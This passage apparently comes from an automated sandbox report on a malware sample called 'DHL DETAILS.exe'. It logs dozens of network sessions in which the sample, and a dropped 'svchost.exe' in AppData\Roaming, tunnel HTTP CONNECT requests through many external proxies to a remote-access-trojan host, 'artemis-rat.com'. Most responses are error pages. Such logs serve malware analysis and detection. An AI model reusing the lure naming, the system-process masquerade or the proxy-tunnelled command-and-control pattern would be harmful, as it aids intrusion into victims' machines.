                                                                                    308192.168.2.551085104.23.141.196806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.340718985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.494832993 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    309192.168.2.551048159.89.138.130806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.342535019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.513547897 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.10.3 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    310192.168.2.55105647.88.3.1980806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.343576908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.084095955 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.4
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    311192.168.2.550913174.64.199.8241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.344973087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    312192.168.2.551097104.19.138.4806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.347516060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.502717018 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    313192.168.2.550827193.239.56.8480816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.349531889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    314192.168.2.55086818.135.133.11631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.349657059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.640599012 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    315192.168.2.551105104.16.107.206806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.351048946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.505291939 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    316192.168.2.55101223.152.40.1550506352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.354043961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    317192.168.2.55071494.131.60.2065837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.359410048 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    318192.168.2.551100162.159.242.230806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.360425949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.521471024 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    319192.168.2.550863194.163.137.10690506352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.362438917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    320192.168.2.55087734.81.72.31806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.365977049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.004934072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    321192.168.2.551146203.30.191.34806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.369273901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.523793936 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    322192.168.2.55129843.157.51.434436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.370274067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    323192.168.2.55129943.157.51.434436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.371747971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    324192.168.2.55096598.162.25.4316546352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.372549057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    325192.168.2.55130143.157.51.434436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.373157978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    326192.168.2.55130243.157.51.434436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.374300957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    327192.168.2.5508828.213.137.1551356352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.378995895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.785095930 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:17.785325050 CET44INHTTP/1.1 200 OK
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    328192.168.2.550899130.162.213.17531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.379092932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.692152977 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    329192.168.2.551167104.16.108.42806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.379621983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.533839941 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    330192.168.2.551175104.16.25.216806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.383275986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.537301064 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
